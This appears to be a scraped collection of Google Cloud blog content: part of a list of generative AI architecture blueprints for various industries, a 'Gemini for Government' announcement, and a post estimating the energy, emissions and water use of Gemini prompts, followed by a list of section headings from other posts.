Business challenge: You’re a manufacturer of configurable products like solar panel systems. Your challenge is that creating an accurate quote is a slow, manual process requiring an expert to assess customer-specific variables (like roof size), which creates a bottleneck in your sales process.
Tech stack: Google Maps Platform (Aerial View API), Vertex AI, Document AI.
Blueprint: A prospective customer provides their address. ➝ A service calls the Google Maps Aerial View API to get high-resolution imagery of the property’s roof. ➝ This imagery is analyzed by a Vertex AI model to measure the roof’s dimensions and identify obstructions. ➝ The system calculates the optimal number of solar panels and generates a quote. ➝ If the customer uploads a utility bill via Document AI, the system can even calculate potential savings, delivering a complete, accurate quote in 15 minutes instead of two hours.

76. Democratize data access with a natural language to SQL agent

Business challenge: You’re a large manufacturing enterprise with valuable data locked away in complex databases. Your challenge is that only a small number of technical employees can write SQL queries, creating a bottleneck and preventing business users from getting the insights they need.
Tech stack: BigQuery, Vertex AI, Looker or another BI tool.
Blueprint: All critical company data (e.g., SAP Materials data) is consolidated into BigQuery. ➝ An employee uses an internal BI tool and types a natural language question, such as “What was our total pulp production in Q2 for the southern region, and how does that compare to Q1?”. ➝ The question is sent to a Gemini model that has been trained on the company’s BigQuery schema. ➝ The model translates the natural language question into an accurate SQL query. ➝ The query is automatically run against BigQuery, and the results are returned and visualized for the employee, reducing query time.

77. Build an AI-powered agricultural insights platform

Business challenge: You’re a company in the agricultural science sector. Your challenge is helping farmers move from traditional farming methods to a more data-driven approach, enabling them to increase yields and operate more sustainably in the face of changing climate conditions.
Tech stack: BigQuery, Vertex AI, Google Earth Engine, IoT sensors.
Blueprint: Data from on-farm IoT sensors, satellite imagery from Google Earth Engine, and weather data are all consolidated into BigQuery. ➝ Vertex AI models analyze this multi-layered dataset to generate hyper-local insights for a specific field. ➝ A farmer receives a recommendation on their device, such as “Your soil moisture in Section B is 15% below optimal. Based on the 7-day forecast, I recommend irrigating with 1 inch of water tomorrow morning to maximize yield.”

78. Embed on-device AI for frontline worker efficiency

Business challenge: You’re a manufacturer of specialized hardware, like mobile computing devices for retail workers. You want to differentiate your product by providing intelligent, built-in features that help frontline workers make better, faster decisions on the job.
Tech stack: On-device AI models (e.g., Gemini Nano), Vertex AI, a device management platform.
Blueprint: A retail worker scans a shelf with their device. ➝ An on-device computer vision model recognizes the products and counts the inventory. ➝ The device compares the count to the store’s inventory data and identifies a low-stock item. ➝ A lightweight, on-device model generates an alert and a suggested action, such as “Only 2 units of ‘Product X’ left on the shelf. The backroom has 25. Suggest creating a restocking task.”, empowering the worker to prevent a stockout in the moment.

79. Forecast energy grid CO2 intensity with AI

Business challenge: You’re an energy transmission provider committed to sustainability. Your challenge is understanding and predicting the real-time carbon intensity of your electricity grid, which is necessary to optimize the use of renewables and reduce overall emissions.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time data on energy generation from all sources (solar, wind, gas, coal) is streamed into BigQuery. ➝ A Vertex AI forecasting model analyzes this data, along with weather forecasts, to predict the CO2 intensity of the grid for the next 24 hours. ➝ A service on Cloud Run exposes this forecast via an API. ➝ This allows the grid operator to make smarter decisions, like scheduling high-demand industrial processes for times when renewable energy is plentiful and CO2 intensity is lowest.

80. Identify and monetize underutilized energy capacity

Business challenge: You’re an energy services company focused on grid stability and social equity. Your challenge is identifying small pockets of underutilized energy capacity across thousands of commercial buildings that could be aggregated and redirected to benefit communities in need.
Tech stack: Vertex AI, BigQuery, IoT smart meters.
Blueprint: Data from IoT smart meters in commercial buildings is streamed into BigQuery. ➝ Vertex AI models analyze the energy consumption patterns of thousands of buildings to identify “underutilized capacity”—for example, an office building that consistently uses 20% less power on Friday afternoons. ➝ The system aggregates these small, distributed energy “assets.” ➝ This aggregated capacity can then be offered to utilities to stabilize the grid or provided as energy credits to low-income households, creating a new, equitable energy economy.

81. Automate customer onboarding in the energy sector

Business challenge: You’re an energy company, and signing up new customers is a manual process that involves processing documents like previous utility bills and personal IDs. Your challenge is to automate this workflow to make onboarding faster, reduce fraud, and improve the customer experience.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A new customer uploads a photo of their old utility bill and their driver’s license to your website. ➝ The files are sent to a service on Cloud Run, which uses Document AI to extract structured data from both documents. ➝ The service calls a Gemini Flash model with a prompt like, “Does the name and address on this utility bill match the name and address on this driver’s license?” ➝ Upon receiving a positive confirmation, the system automatically creates the new customer account, completing the onboarding and verification process in seconds.

101+GenAI_Blog_Header_009-Public-Sector-&-Nonprofits

These architectural blueprints are based on the incredible results customers in the public sector and nonprofits are seeing from using AI. Customers include Alma, Beyond 12, Bower, Climate Ride, Code Path, Pepperdine University and more.

82. Build a conversational coach for student success

Business challenge: You’re a nonprofit or educational institution focused on helping first-generation students from under-resourced communities succeed in college. Your challenge is providing personalized, scalable coaching that can address each student’s unique history and goals without making them feel compared to others.
Tech stack: Vertex AI, BigQuery, a student-facing mobile app.
Blueprint: A student’s academic history, goals, and previous interactions are stored in BigQuery. ➝ When the student interacts with the AI coach in their app, their query is sent to a service that retrieves their personal context from BigQuery. ➝ This history and the student’s question are sent to a Gemini model with a prompt like, “This student is feeling overwhelmed with their chemistry class. Based on their goal of becoming a nurse, provide an encouraging response and suggest two specific campus resources that can help.” ➝ The AI delivers a personalized, empathetic response, acting as a scalable mentor.

83. Create an AI assistant for legal aid and immigration

Business challenge: You’re a legal aid nonprofit. Your challenge is that clients are often overwhelmed by complex legal documents and don’t know what their next steps are, while your staff has limited bandwidth to provide one-on-one guidance for every query.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: An asylum seeker uses their phone to take a picture of a legal letter they received. ➝ The image is uploaded to a service on Cloud Run, which sends it to Document AI to extract all the text and key entities like dates and case numbers. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “Based on this legal notice, explain what it means in simple terms and list the top 3 most important next steps the recipient should take.” ➝ The app displays the simplified explanation and actionable guidance, empowering the user to navigate the complex legal process.

84. Develop an SMS chatbot for public benefits applications

Business challenge: You’re a government agency or nonprofit administering a public benefits program like SNAP. Your challenge is that the application process is often complex and confusing, creating a barrier for eligible individuals and families who need assistance.
Tech stack: Vertex AI, SMS API, a benefits eligibility database.
Blueprint: A person sends a text message like “FOOD” to a designated number. ➝ The SMS API receives the message and forwards it to a Vertex AI Conversation agent. ➝ The agent initiates a conversation, asking simple, conversational questions to determine eligibility (e.g., “How many people are in your household?”). ➝ Based on the user’s responses, the agent checks the eligibility database. ➝ The chatbot provides an immediate response, such as “Based on your answers, you are likely eligible for SNAP benefits. Would you like me to help you start the application?”, turning a multi-day process into minutes.

85. Create a digital case manager to assist social workers

Business challenge: You’re a nonprofit where caseworkers are responsible for large caseloads. Your challenge is that these workers spend dozens of hours per week on administrative tasks like writing action plans and summaries, taking time away from direct, high-impact work with beneficiaries.
Tech stack: Vertex AI, a case management system (e.g., Salesforce), Cloud Functions.
Blueprint: A caseworker finishes a meeting with a beneficiary. ➝ The notes from the meeting are saved in their case management system, which triggers a Cloud Function. ➝ The function retrieves the new notes along with the beneficiary’s entire case history. ➝ This information is sent to a Gemini model with a prompt like, “Based on this beneficiary’s history and the notes from today’s meeting, draft a detailed action plan for the next 30 days.” ➝ The AI-generated draft plan is automatically added to the case file, ready for the caseworker to review and approve, saving them hours of writing.

86. Accelerate grant writing for nonprofits

Business challenge: You’re a nonprofit that relies on grant funding to operate. Your challenge is that grant writing is a time-consuming, repetitive process that pulls your small team away from delivering on your core mission.
Tech stack: Gemini for Google Workspace.
Blueprint: A grant writer opens a Google Doc using a template for a new grant proposal. ➝ The template contains standard sections like “Organization History,” “Mission Statement,” and “Program Budget.” ➝ For a repetitive section, the writer uses the integrated Gemini feature with a prompt like, “Write a 200-word summary of our organization’s mission, based on our website and past proposals.” ➝ Gemini generates the text, filling in the routine information instantly. ➝ This allows the grant writer to focus their time and creativity on the unique, strategic parts of the proposal, cutting grant-writing time.

87. Build a platform to match talent with job opportunities

Business challenge: You’re a government agency or nonprofit focused on workforce development. Your challenge is connecting qualified candidates, especially those from non-traditional backgrounds, with relevant job opportunities in the private sector efficiently and at scale.
Tech stack: Vector Search, BigQuery, Cloud Run.
Blueprint: Job seekers and employers create profiles on the platform, and the data is stored in BigQuery. ➝ Candidate skills and job requirements are converted into vector embeddings and indexed in Vector Search . ➝ When a new job is posted, the system uses the Vector Search to find the top candidate profiles with the most similar embeddings. ➝ For each match, Gemini can be used to generate a personalized pitch, such as “This candidate seems like a strong fit for your ‘Software Engineer’ role because their project experience in ‘X’ aligns with your need for ‘Y’.”

88. Enhance government transparency with a citizen chatbot

Business challenge: You’re a local government or county office. Your challenge is providing residents with quick and accurate answers to their questions, as your small staff can get overwhelmed with calls, and information on your website can be hard to find.
Tech stack: Vertex AI Search, Cloud Run.
Blueprint: All public county documents, meeting minutes, and website pages are indexed into Vertex AI Search. ➝ A resident visits the county website and uses a chatbot to ask, “When is the next town hall meeting about the new park?” ➝ The query is sent to a service on Cloud Run, which passes it to Vertex AI Search. ➝ The system finds the relevant information from the indexed documents and provides a direct answer with a link to the source. ➝ This empowers residents with self-service access to information and frees up county staff.

89. Use AI to improve tax collection and auditing

Business challenge: You’re a municipal finance office responsible for tax collection. Your challenge is ensuring that tax classifications on invoices are correct, as manual audits can only cover a tiny fraction of submissions, leading to significant lost revenue from misclassifications.
Tech stack: Document AI, Vertex AI, BigQuery.
Blueprint: When a company submits an invoice, it is automatically processed by Document AI to extract the service descriptions and declared tax category. ➝ The extracted data is stored in BigQuery. ➝ A Vertex AI classification model, trained on historical data of correct and incorrect classifications, analyzes the service description from the new invoice. ➝ If the model predicts a different category than the one declared by the taxpayer (e.g., it classifies a “consulting” service as “software development,” which has a higher tax rate), the invoice is flagged for human review, improving accuracy and tax collection.

90. Detect and combat misinformation at scale

Business challenge: You’re a nonprofit fact-checking organization. Your challenge is the sheer volume of new information being published every second, making it impossible for your human fact-checkers to monitor everything and identify which claims need to be addressed most urgently.
Tech stack: Pub/Sub, Vertex AI, Cloud Functions.
Blueprint: A constant stream of content from news sites and social media APIs flows into Pub/Sub. ➝ A Cloud Function is triggered for each new piece of content. ➝ The content is sent to a Gemini model with a prompt like, “Analyze this news article. Identify any verifiable claims and check them against our database of known misinformation. Flag any new, rapidly-spreading, or potentially-harmful claims.” ➝ The system automatically filters out noise and surfaces a prioritized list of new, high-impact claims for human fact-checkers to investigate, allowing them to focus their efforts where it matters most.

91. Accelerate discovery of hidden objects

Business challenge: You’re a scientific institute. Your challenge is finding “hidden” objects like asteroids in massive astronomical datasets, a task that is like finding a needle in a haystack for human researchers.
Tech stack: BigQuery, Vertex AI, Google Cloud Storage.
Blueprint: Petabytes of astronomical image data from telescope surveys are stored in Google Cloud Storage and cataloged in BigQuery. ➝ A Vertex AI computer vision model is trained to recognize the faint, tell-tale signs of moving objects against the background of stars. ➝ The model is run on the entire historical dataset, analyzing images that have already been reviewed by humans. ➝ The AI flags potential new asteroid discoveries that were missed by previous methods, which are then presented to astronomers for verification, dramatically accelerating the rate of discovery.

These architectural blueprints are inspired by customers who are using AI in the technology industry, such as: Personal AI, Causal, Abstrakt, BMC, Snap, Augment, Box, Twilio, and more.

92. Build a personal AI that learns from your data

Business challenge: You’re a technology company aiming to create a truly personal AI assistant. Your challenge is moving beyond generic, one-size-fits-all models to create an AI that is trained exclusively on an individual’s own data, facts, and opinions, ensuring privacy and a perfectly tailored experience.
Tech stack: Vertex AI, Google Cloud Storage, Cloud Run.
Blueprint: A user uploads their personal data (documents, emails, notes) to a secure Google Cloud Storage bucket. ➝ A fine-tuning job is initiated on Vertex AI, training a baseline Gemini model exclusively on this personal data corpus. ➝ The resulting “personal language model” is deployed to a secure endpoint on Cloud Run. ➝ When the user interacts with their personal AI, their queries are sent only to their own custom model, allowing it to provide responses that reflect their unique knowledge, style, and memory.

93. Create an AI-powered financial planning wizard

Business challenge: You’re a fintech company providing financial planning software for startups. Your challenge is that new users often struggle with the initial setup, which requires connecting disparate data sources and building complex financial models from scratch.
Tech stack: Vertex AI, BigQuery, connections to third-party data source APIs.
Blueprint: A new user signs up and grants access to their financial data sources (e.g., accounting software, bank accounts). ➝ An AI wizard ingests the data into BigQuery. ➝ The wizard sends the consolidated data to Gemini with a prompt like, “Analyze this company’s financial data. Identify key revenue streams, cost centers, and growth patterns, then generate a standard three-statement financial model.” ➝ Gemini generates the baseline model, which is then presented to the user, turning a multi-hour setup process into minutes.

94. Develop a sales co-pilot to help B2B sellers

Business challenge: You’re a B2B sales technology company. Your challenge is helping sales representatives navigate complex organizational data to find the right insights to close deals, a process that often involves manually sifting through CRM data, past deals, and product documentation.
Tech stack: Vertex AI, BigQuery, CRM integration.
Blueprint: All of a company’s sales data—CRM records, past deals, and product information—is consolidated in BigQuery and indexed into Vertex AI Search. ➝ A salesperson preparing for a call uses a co-pilot and asks, “I’m about to call a prospect in the manufacturing industry. Give me key talking points, relevant case studies, and potential objections.” ➝ The co-pilot uses Vertex AI Search to find the most relevant information. ➝ Gemini synthesizes this data into a concise briefing document, empowering the salesperson to have a more strategic and effective conversation.

95. Build an AI agent to transcribe and analyze meetings

Business challenge: You’re a collaboration software company. Valuable information shared in voice conversations and video meetings is often lost or requires hours of manual work to transcribe and summarize for those who couldn’t attend.
Tech stack: Speech-to-Text API, Vertex AI, Cloud Run functions.
Blueprint: A user connects the AI agent to their calendar. ➝ When a meeting starts, the agent joins the call and records the audio. ➝ After the meeting, a Cloud Run function sends the audio file to the Speech-to-Text API for a full transcription. ➝ The transcript is then sent to Gemini with a prompt like, “Summarize this meeting transcript, identify all action items and assign them to the correct person, and list the key decisions that were made.” ➝ The structured summary and action items are then emailed to all attendees, saving time and improving collaboration.

96. Create an enterprise search engine for workplace knowledge

Business challenge: You’re a company whose employees use dozens of different applications (like Slack, Google Drive, Salesforce, Confluence). Your challenge is that valuable company knowledge is fragmented across these silos, making it nearly impossible for employees to find the information they need to do their jobs effectively.
Tech stack: Vertex AI Search, connectors to various enterprise applications.
Blueprint: Secure connectors are used to index all of a company’s data from its various workplace apps into Vertex AI Search, respecting all existing user permissions. ➝ An employee uses a single search bar and asks a question like, “What was our Q3 marketing strategy for the new product launch?” ➝ Vertex AI Search queries across all connected data sources—finding the strategy document in Google Drive, the related conversations in Slack, and the campaign results in Salesforce. ➝ It returns a unified, synthesized answer with links to the original sources, allowing employees to find information.

97. Deploy video intelligence agents for any CCTV camera

Business challenge: You’re a business with hundreds of CCTV cameras for security. Your challenge is that these cameras generate thousands of hours of passive video footage that is only reviewed after an incident occurs, providing no proactive operational or business insights.
Tech stack: Vertex AI, Cloud Storage, a mobile alerting system.
Blueprint: Live video feeds from CCTV cameras are streamed to Google Cloud Storage. ➝ A multimodal Gemini model, acting as a “video intelligence agent,” continuously monitors the feeds. ➝ The agent is given specific tasks via natural language prompts, such as “Monitor the store entrance and send an alert if more than 10 people are waiting in line for over 5 minutes,” or “Alert security if anyone enters the warehouse after 10 PM.” ➝ When the AI agent detects a specified event, it automatically sends a real-time alert with a video clip to the relevant personnel’s mobile device.

98. Build an agent for B2B workflow automation

Business challenge: You’re a B2B technology company, and you recognize that your clients in different departments (e.g., sales, HR, finance) have unique, complex workflows that are difficult to automate with one-size-fits-all software.
Tech stack: Vertex AI, various third-party API connectors.
Blueprint: A platform provides a framework for building specialized AI agents. ➝ A company can create an “HR Onboarding Agent” and give it access to their HR systems. ➝ When a new employee is hired, the agent automatically executes a multi-step workflow: it creates their user account, assigns required training, and schedules orientation meetings. ➝ The agent uses Gemini to orchestrate these tasks by calling the appropriate APIs for each system, automating a complex cross-departmental workflow that would otherwise require significant manual coordination.

99. Transform customer feedback into product insights

Business challenge: You’re a product development company, and you need to understand how customers feel about your product, but their feedback is scattered across support tickets, app store reviews, and social media. Manually analyzing this unstructured text is a massive challenge.
Tech stack: Vertex AI, BigQuery, data ingestion tools (e.g., Pub/Sub).
Blueprint: All customer feedback streams from various sources into BigQuery. ➝ A scheduled job sends batches of new feedback to a Gemini model. ➝ The model is given a prompt like, “Analyze this feedback. Categorize each comment by topic (e.g., ‘UI/UX’, ‘Pricing’, ‘Bug Report’), determine the sentiment (Positive, Negative, Neutral), and extract any feature requests.” ➝ The structured, analyzed data is written back to BigQuery. ➝ Product managers can now use a simple dashboard to see trends, like “There was a 30% increase in negative comments about ‘login issues’ this week,” allowing them to take data-driven action.

100. Automate the creative process in marketing campaigns

Business challenge: You’re a digital marketing platform, and your clients need to create a high volume of ads for different products and channels. Your challenge is automating the creative process so they can launch effective campaigns without needing a large design team.
Tech stack: Vertex AI, Text-to-Speech API, Cloud Run.
Blueprint: A user provides a few key details about their product and a target audience. ➝ This information is sent to a service on Cloud Run, which constructs a prompt for Gemini like, “Generate three different ad headlines and a short script for a 15-second video ad for a new running shoe targeting marathon runners.” ➝ Gemini generates the text. ➝ The service then sends the script to the Text-to-Speech API to create a voiceover. ➝ The text and voiceover are then combined with product images using a template, automatically generating multiple ad variations that are ready to be deployed.

101. Provide an AI observability platform for LLM evaluation

Business challenge: You’re an enterprise that is deploying multiple AI applications, but you lack the tools to monitor, troubleshoot, and evaluate their performance in production. Your challenge is ensuring these AI systems are accurate, safe, and effective once they are live.
Tech stack: Google Kubernetes Engine (GKE), BigQuery, Vertex AI.
Blueprint: An enterprise’s AI applications send their inputs, outputs, and model telemetry data to an observability platform running on GKE. ➝ This data is processed and stored in BigQuery for large-scale analysis. ➝ The platform uses Vertex AI models to automatically detect issues like “model drift” (when a model’s performance degrades over time) or “hallucinations” (when an LLM generates incorrect information). ➝ When an issue is detected, the platform sends an alert to the development team via a dashboard, allowing them to quickly diagnose and fix problems with their production AI systems.

Read More for the details.

2025 08 21

GCP – Introducing ‘Gemini for Government’: Supporting the U.S. Government’s Transformation with AI

Tibor Kiss Cloud, Google Cloud gcp

Google is proud to support the U.S. government in its modernization efforts through the use of AI. Today, in partnership with the General Services Administration (GSA) and in support of the next phase of the GSA’s OneGov Strategy and President Trump’s AI Action Plan, we’re thrilled to announce a new, comprehensive ‘Gemini for Government’ offering.

Building on the well-received Google Workspace discount we announced for government agencies earlier this year, ‘Gemini for Government’ brings together the best of Google’s AI-optimized and accredited commercial cloud, industry-leading Gemini models, and agentic solutions to support the missions of government agencies like never-before. While many AI models have been offered to the government, the ‘Gemini for Government’ offering is a complete AI platform – including Google-quality enterprise search, video and image generation capabilities, the popular NotebookLM AI tool, out-of-the-box AI agents for Deep Research and Idea Generation, and the ability for employees to create their own AI agents. Priced at less than $0.50 per government agency for a year, this comprehensive package enables U.S. government employees to access Google’s leading AI offerings at very little cost.

GSA appreciates Google’s partnership and we’re excited to add the comprehensive ‘Gemini for Government’ AI solution to OneGov,” said Federal Acquisition Service Commissioner Josh Gruenbaum. “GSA is delivering on the President’s AI Action Plan and helping agencies access powerful American AI tools to optimize daily workflows and create a more efficient, responsive, and effective government for American taxpayers. Critically, this offering will provide partner agencies with vital flexibility in GSA’s marketplace, ensuring they have the options needed to sustain a strong and resilient procurement ecosystem.

Josh Gruenbaum

Federal Acquisition Service Commissioner

‘Gemini for Government’ includes FedRAMP High-authorized security and compliance features. (For a complete list of Google’s FedRAMP authorized services, visit ‘Google Services’ on the FedRAMP Marketplace.) ‘Gemini for Government’ is a seamlessly integrated solution designed from the ground up for AI, and is built upon three pillars:

An enterprise platform with choice and control

‘Gemini for Government’ brings the best of commercial innovation to the government with an AI Agent Gallery; agent-to-agent communication protocols; connectors into enterprise data sets; pre-built AI agents; and an open platform that enables agencies to choose the right agents for their users – whether built by Google, third-parties, or government agencies themselves. Being able to launch and monitor agentic use cases through ‘Gemini for Government’ gives agencies flexibility and control. They can closely manage and scale agency-wide agent adoption with user access controls, AI agent provisioning, and multi-agent coordination. ‘Gemini for Government’ also pairs with Google Cloud’s Vertex AI platform, which allows agencies to tune or ground their own models as well.

2. Super-powered security, built-in

Every day, Google protects billions of customer devices, collects frontline cyber threat intelligence, and provides industry-leading cyber incident response to entities around the world. This wealth of expertise underpins the security protection integrated into all of our products. As part of the ‘Gemini for Government’ offering, agencies also receive built-in Advanced Security features, including Identity & Access Management, basic threat protection, AI threat protection, data privacy, SOC2 Type 2 compliance, advanced compliance (with Sec4, FedRAMP), and more. Agencies also have the option of deploying additional Google security solutions at discounted government pricing – and these solutions seamlessly integrate with various third-party security solutions and security stacks, allowing organizations to maximize the value of their investments.

3. A true transformation partner

By working with the GSA under its OneGov Strategy, Google ensures that government agencies will find ‘Gemini for Government’ easy to implement and use. Our offering is aligned with how government procurement works – today and into the future – and includes transparent pricing and a predictable path to realizing value, helping agencies future-proof their AI investments. Of course, Google’s commitment to the government extends far beyond providing cutting-edge AI solutions. We are a long-term, strategic partner for America, deeply invested in the mission, innovation, and security of our government.

We’re excited to embark on this journey with the public sector, working hand-in-hand with the GSA to realize the full potential of OneGov through our ‘Gemini for Government’ offering. Together, we can help to scale innovation, drive efficiency, and create a more secure – and prosperous – future for our nation. Agencies ready to learn more about this offering should reach out to the National Customer Service Center at ITCSC@gsa.gov⁠ or Google Public Sector at geminiforgov@google.com.

Read More for the details.

2025 08 21

GCP – How much energy does Google’s AI use? We did the math

Tibor Kiss Cloud, Google Cloud gcp

AI is unlocking scientific breakthroughs, improving healthcare and education, and could add trillions to the global economy. Understanding AI’s footprint is crucial, yet thorough data on the energy and environmental impact of AI inference — the use of a trained AI model to make predictions or generate text or images — has been limited. As more users use AI systems, the importance of inference efficiency rises.

That’s why we’re releasing a technical paper detailing our comprehensive methodology for measuring the energy, emissions, and water impact of Gemini prompts. Using this methodology, we estimate the median Gemini Apps text prompt uses 0.24 watt-hours (Wh) of energy, emits 0.03 grams of carbon dioxide equivalent (gCO2e), and consumes 0.26 milliliters (or about five drops) of water¹ — figures that are substantially lower than many public estimates. The per-prompt energy impact is equivalent to watching TV for less than nine seconds.

At the same time, our AI systems are becoming more efficient through research innovations and software and hardware efficiency improvements. For example, over a recent 12 month period, the energy and total carbon footprint of the median Gemini Apps text prompt dropped by 33x and 44x, respectively, all while delivering higher quality responses. These results are built on our latest data center energy emissions reductions and our work to advance carbon-free energy and water replenishment. While we’re proud of the innovation behind our efficiency gains so far, we’re committed to continuing substantial improvements. Here’s a closer look at these ongoing efforts.

Calculating the environmental footprint of AI at Google

Detailed measurement lets us compare across different AI models, and the hardware and energy they run on, while enabling system-wide efficiency optimizations — from hardware and data centers to the models themselves. By sharing our methodology, we hope to increase industry-wide consistency in calculating AI’s resource consumption and efficiency.

Measuring the footprint of AI serving workloads isn’t simple. We developed a comprehensive approach that considers the realities of serving AI at Google’s scale, which include:

Full system dynamic power: This includes not just the energy and water used by the primary AI model during active computation, but also the actual achieved chip utilization at production scale, which can be much lower than theoretical maximums.
Idle machines: To ensure high availability and reliability, production systems require a degree of provisioned capacity that is idle but ready to handle traffic spikes or failover at any given moment. The energy consumed by these idle chips must be factored into the total energy footprint.
CPU and RAM: AI model execution doesn’t happen solely in ML accelerators like TPUs and GPUs. The host CPU and RAM also play a crucial role in serving AI, and use energy.
Data center overhead: The energy consumed by the IT equipment running AI workloads is only part of the story. The infrastructure supporting these computations — cooling systems, power distribution, and other data center overhead — also consumes energy. Overhead energy efficiency is measured by a metric called Power Usage Effectiveness (PUE).
Data center water consumption: To reduce energy consumption and associated emissions, data centers often consume water for cooling. As we optimize our AI systems to be more energy-efficient, this naturally decreases their overall water consumption as well.

Many current AI energy consumption calculations only include active machine consumption, overlooking several of the critical factors discussed above. As a result, they represent theoretical efficiency instead of true operating efficiency at scale. When we apply this non-comprehensive methodology that only considers active TPU and GPU consumption, we estimate the median Gemini text prompt uses 0.10 Wh of energy, emits 0.02 gCO2e, and consumes 0.12 mL of water. This is an optimistic scenario at best and substantially underestimates the real operational footprint of AI.

Our comprehensive methodology’s estimates (0.24 Wh of energy, 0.03 gCO2e, 0.26 mL of water) account for all critical elements of serving AI globally. We believe this is the most complete view of AI’s overall footprint.

Our full-stack approach to AI — and AI efficiency

Gemini’s dramatic efficiency gains stem from Google’s full-stack approach to AI development — from custom hardware and highly efficient models, to the robust serving systems that make these models possible. We’ve built efficiency into every layer of AI, including:

More efficient model architectures: Gemini models are built on the Transformer model architecture developed by Google researchers, which provide a 10-100x efficiency boost over the previous state-of-the-art architectures for language modeling. We design models with inherently efficient structures like Mixture-of-Experts (MoE) and hybrid reasoning. MoE models, for example, allow us to activate a small subset of a large model specifically required to respond to a query, reducing computations and data transfer by a factor of 10-100x.
Efficient algorithms and quantization: We continuously refine the algorithms that power our models with methods like Accurate Quantized Training (AQT) to maximize efficiency and reduce energy consumption for serving, without compromising response quality.
Optimized inference and serving: We constantly improve AI model delivery for responsiveness and efficiency. Technologies like speculative decoding serve more responses with fewer chips by allowing a smaller model to make predictions that are then quickly verified by a larger model, which is more efficient than having the larger model make many sequential predictions on its own. Techniques like distillation create smaller, more efficient models (Gemini Flash and Flash-Lite) for serving that use our larger, more capable models as teachers. Faster machine learning hardware and models enable us to use more efficient larger batch sizes when handling requests, while still meeting our latency targets.
Custom-built hardware: We’ve been designing our TPUs from the ground up for over a decade to maximize performance per watt. We also co-design our AI models and TPUs, ensuring our software takes full advantage of our hardware — and that our hardware is able to efficiently run our future AI software when both are ready. Our latest-generation TPU, Ironwood, is 30x more energy-efficient than our first publicly-available TPU and far more power-efficient than general-purpose CPUs for inference.
Optimized idling: Our serving stack makes highly efficient use of CPUs and minimizes TPU idling by dynamically moving models based on demand in near-real-time, rather than using a “set it and forget” approach.
ML software stack: Our XLA ML compiler, Pallas kernels, and Pathways systems enable model computations expressed in higher-level systems like JAX to run efficiently on our TPU serving hardware.
Ultra-efficient data centers: Google’s data centers are among the industry’s most efficient, operating at a fleet-wide average PUE of 1.09.
Responsible data center operations: We continue to add clean energy generation in pursuit of our 24/7 carbon-free ambition, while advancing our aim to replenish 120% of the freshwater we consume on average across our offices and data centers. We also optimize our cooling systems, balancing the local trade-off between energy, water, and emissions, by conducting science-backed watershed health assessments, to guide cooling type selection and limit water use in high-stress locations.

Our commitment to efficient AI

Gemini’s efficiency gains are the result of years of work, but this is just the beginning. Recognizing that AI demand is growing, we’re heavily investing in reducing the power provisioning costs and water required per prompt. By sharing our findings and methodology, we aim to drive industry-wide progress toward more efficient AI. This is essential for responsible AI development.

^{1. A point-in-time analysis quantified the energy consumed per median Gemini App text-generation prompt, considering data from May 2025. Emissions per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide grid carbon intensity. Water consumption per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide water usage effectiveness. These findings do not represent the specific environmental impact for all Gemini App text-generation prompts nor are they indicative of future performance.
2. The results of the above analysis from May 2025 were compared to baseline data from the median Gemini App text-generation prompt in May 2024. Energy per median prompt is subject to change as new models are added, AI model architecture evolves, and AI chatbot user behavior develops. The data and claims have not been verified by an independent third-party.}

Read More for the details.

Google Cloud

What are Storage Insights datasets?

Use cases

Taking your analysis further

Get started

Meet the new cohort of the Google for Startups Accelerator: AI First

Get started

What is Skopeo?

Why use Skopeo with Google Cloud?

Setting up your environment

Set Environment Variables

Configure Authentication

Create Artifact Registry Repository (if needed)

Skopeo use cases with Google Cloud

Integrating with Google Cloud services

Supporting security workflows

Conclusion

The Forrester Total Economic Impact™ Study: Quantifying the Value of ChromeOS

Increased End-User Productivity

Lowered Device and Licensing Costs

Strengthened Security Posture

Reduced IT Support Needs

Discover More: Join Our Webinar!

Differentiated, rapid, and holistic incident response

Unparalleled access to threat intelligence

Advancing cyber defenses with a strategic, global leader

Learn more — and strengthen your defenses today

Google named a Leader in the Cybersecurity Incident Response Services Forrester Wave, Q2 2024

What’s new in Firestore with MongoDB compatibility

Enhanced flexibility with updated pricing

Optimized compute with Autopilot for every cluster

Innovations for customer success

Foundations for consistent evolution

Here’s how customers are leveraging Vertex AI to build next-gen visuals with Gemini 2.5 Flash Image

Get started

Introduction

Threat Detail

Query to Retrieve User Data

Query to Retrieve Case Data

Recommendations

Investigate for Compromise and Scan for Exposed Secrets

Rotate Credentials

Harden Access Controls

Acknowledgments

IOCs

Getting to know the Conversational Analytics API

An agentic architecture powered by Google AI

Context retrieval and generation

Low maintenance burden

API powered chats from anywhere

Bringing Earth Engine to data analysts

What’s new in Earth Engine in BigQuery

A new way to visualize BigQuery geospatial data

Example: Analyzing extreme precipitation events

The future of geospatial analysis is here

Prerequisites

Gathering Information on Your Use Case

What model are you using?

What is the precision of the model you’re using?

Workload characteristics: How many requests/second are you expecting?

What is the average sequence length per request?

What is the maximum total sequence length we will need to be able to handle?

What is the GPU Utilization you’ll be using?

What is your prefix cache rate?

What is your latency requirement?

Selecting Accelerators (xPU)

Identifying Candidate Accelerators

Accelerator-optimized Options

TPU Options

Calculate Memory Requirements

Is Tensor Parallelism Required?

Benchmarking, Tuning and Finalizing Your vLLM Configuration

Accelerator-optimized Machine Type

TPU v6e (aka Trillium)

Calculating Performance-Cost Ratio

Anonymized Accelerator-optimized Candidate

Google Cloud TPU v6e (v6e-4)

Conclusion: The Most Cost-Effective Choice

Final Reminder

Additional Resources